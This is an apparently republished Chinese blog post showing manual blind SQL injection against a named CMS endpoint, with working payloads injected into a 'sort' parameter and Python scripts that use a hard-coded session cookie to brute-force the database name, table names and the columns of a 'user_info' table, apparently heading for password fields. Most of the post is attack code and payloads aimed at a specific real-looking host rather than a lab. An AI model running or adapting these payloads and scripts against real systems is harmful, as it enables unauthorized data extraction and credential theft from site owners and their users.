博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
python辅助sql手工注入猜解数据库案例分析
阅读量:4946 次
发布时间:2019-06-11

本文共 6751 字,大约阅读时间需要 22 分钟。

发现存在sql注入漏洞

简单一点可以直接用sqlmap工具暴库

但是如果想深入理解sql注入的原理,可以尝试手工注入,配合python脚本实现手工猜解数据库

首先hachbar开启

获取cms登录后的sessionid值

开始构造sql payload

获取数据库名的长度:

page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN (length(database())=8) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc

手工猜解需要从1往后遍历,当为8时,猜解成功

做sql手工注入的,主要是这个猜解的过程比较麻烦,大量的重复工作,所以需要做成python自动化

实现脚本如下:

# -*- encoding:utf-8 -*-#user()#database()import requestscookies={        'SESSION': 'dacee233-9fc0-442b-8948-8c276005d7c2'}string = ''for i in range(1,300):    url='http://yucms.hhlyty.cn/finance/account/accountList'    body = {
   'page': '1','rows': '15','order': 'desc','sort': 'CREATE_DATE,(SELECT (CASE WHEN (length(database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)}  #获取数据库名长度    #body = {
   'page': '1', 'rows': '15', 'order': 'desc','sort': '(SELECT (CASE WHEN ((select count(*) from information_schema.tables where table_schema =database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)}  #获取数据库中表的个数    #body = {
   'page': '1', 'rows': '15', 'order': 'desc','sort': '(SELECT (CASE WHEN ((select count(*) from information_schema.tables where table_schema =database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)}  # 获取数据库中表的个数    rs = requests.request("POST", url, cookies=cookies, params=body)    content=rs.content    length = len(content)    #print length    if length == 9459:        print ("数据库长度为:%d" %i)        print(rs.text)        #string += j#        break#        print string#print(rs.text)

猜解数据库完整的名字

payload

page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN (substr(database(),1,1)=char(71)) THEN 1 ELSE 2302*(SELECT 2302 FROM INFORMATION_SCHEMA.TABLES) END))&order=desc

substr(database(),1,1 ,第一个1,表示字符串的第几位,第二个1,表示截取一位,这样,就可以逐字符猜解

# -*- encoding:utf-8 -*-import requestscookies={        'SESSION': 'dacee233-9fc0-442b-8948-8c276005d7c2'}#dic1='3_abcdefghijklmnopqrstuvwxyz'dic="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_^~]}\|[{?>=<;:/.-,+*)('&%$#@!"print len(dic)string = ''for i in range(1,92):    # leng = len(string)    # if leng == 8:    for j in dic:        #leng = len(string)        #if leng == 8:        #m=str(ord(j))        #print (m)        m=j        url='http://yucms.hhlyty.cn/finance/account/accountList'        body = {
   'page': '1','rows': '15','order': 'desc','sort': '(SELECT (CASE WHEN (substr(database(),{0},1)=char({1})) THEN 1 ELSE 2302*(SELECT 2302 FROM INFORMATION_SCHEMA.TABLES) END))'.format((i),ord(m))}        rs = requests.request("POST", url, cookies=cookies, params=body)        content=rs.content        length = len(content)        #print (j)        print (body)        #print length        if length == 9459:            print ("数据库第%d个字符是:%s:" % (i, j))            m = str(ord(j))            string += j            i=i+1            print (m)            print (i)            # n=','            # m += n            # print (m)            break    print ("数据库是:%s" % string)    #break    print (i)#    print ("数据库第%d个字符是:%s:" % (i,j))#    print ("数据库是:%s" % string)    # if length == 9459:    #     print ("数据库长度为:%d" %i)    #     print(rs.text)        #string += j#        break#        print string#print(rs.text)

 

 

猜解表名:

1.猜解第204张表名的长度:

page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select length(table_name) from information_schema.tables where table_schema=database() limit 204,1)=9) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)

)&order=desc

# -*- encoding:utf-8 -*-#user()#database()import requestscookies={        'SESSION': 'dacee233-9fc0-442b-8948-8c276005d7c2'}string = ''for i in range(1,300):    url='http://yucms.hhlyty.cn/finance/account/accountList'    #body = {
   'page': '1','rows': '15','order': 'desc','sort': 'CREATE_DATE,(SELECT (CASE WHEN (length(database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)}  #获取数据库名长度    #body = {
   'page': '1', 'rows': '15', 'order': 'desc','sort': '(SELECT (CASE WHEN ((select count(*) from information_schema.tables where table_schema =database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)}  #获取数据库中表的个数    #body = {
   'page': '1', 'rows': '15', 'order': 'desc','sort': '(SELECT (CASE WHEN ((select count(*) from information_schema.tables where table_schema =database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)}  # 获取数据库中表的个数    # body = {
   'page': '1', 'rows': '15', 'order': 'desc','sort': '(SELECT (CASE WHEN ((select count(*) from information_schema.tables where table_schema =database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)}  # 获取数据库中表的个数    body = {
   'page': '1', 'rows': '15', 'order': 'desc','sort': '(SELECT (CASE WHEN ((select length(table_name) from information_schema.tables where table_schema=database() limit 204,1)={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)}  # 获取数据库中第204张表名的长度    rs = requests.request("POST", url, cookies=cookies, params=body)    content=rs.content    length = len(content)    #print length    if length == 9459:        print ("数据库长度为:%d" %i)        print(rs.text)        #string += j#        break#        print string#print(rs.text)

 

page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select ascii((select substr(table_name,1,1) from information_schema.tables where table_schema=database() limit 204,1)))=117) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc

1表示表名的第一个字符

204表示数据库中的第204张表

117表示第一个字符的ascii编码

 

 

猜解列名:

1.首先猜测表中字段的个数

page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select count(*) from information_schema.columns where table_schema=database() and table_name='user_info')=36) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc

2.逐个字段猜解:

猜解密码字段:

猜解第204张表user_info表第一个字段的长度:

page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select length(column_name) from information_schema.columns where table_schema=database() and table_name='user_info' limit 1,1)=7) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc

猜解第一个列名的长度:

猜解字段名字:

page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select ascii((select substr(column_name,1,1) from information_schema.columns where table_schema=database() and table_name='user_info' limit 1,1)))=85) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc

猜解字段名的第一个字符为85

 

转载于:https://www.cnblogs.com/qmfsun/p/7606108.html

你可能感兴趣的文章
SQLServer 错误: 15404,无法获取有关 Windows NT 组
查看>>
html5全局属性
查看>>
【转】Android Hook框架Xposed详解
查看>>
Android 有用代码片段总结
查看>>
英语各种时态例句
查看>>
从下往上看--新皮层资料的读后感 第三部分 70年前的逆向推演- 从NN到ANN
查看>>
(转)系统引导管理器GRUB详解
查看>>
数据访问C#入门经典第21章-读写压缩数据
查看>>
PHP超时处理全面总结(转)
查看>>
利用python进行数据分析--pandas入门2
查看>>
[zz]使用 libevent 和 libev 提高网络应用性能
查看>>
Linux故障处理最佳实践
查看>>
6标准文件读写
查看>>
jsTree 核心功能(core functionality) API
查看>>
Perl oop链接数据库
查看>>
网络虚拟化我眼中的OpenFlow
查看>>
[leetcode] 3. Longest Substring Without Repeating Characters
查看>>
06 Frequently Asked Questions (FAQ) 常见问题解答 (常见问题)
查看>>
获取判断IE版本 TypeError: Cannot read property 'msie' of undefined
查看>>
tcpreplay安装使用
查看>>
喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!-- 愿君每日到此一游!
当前时间: 2024-11-07 03:37:03   当前IP: 3.138.69.214   联系邮箱:javaeecc@qq.com     Copyright © 2020 - 2022 baihongyu.com 京ICP备2021015314号-2
强烈建议你试试无所不能的CHAT-GPT,快点击我
强烈建议你试试无所不能的CHAT-GPT,快点击我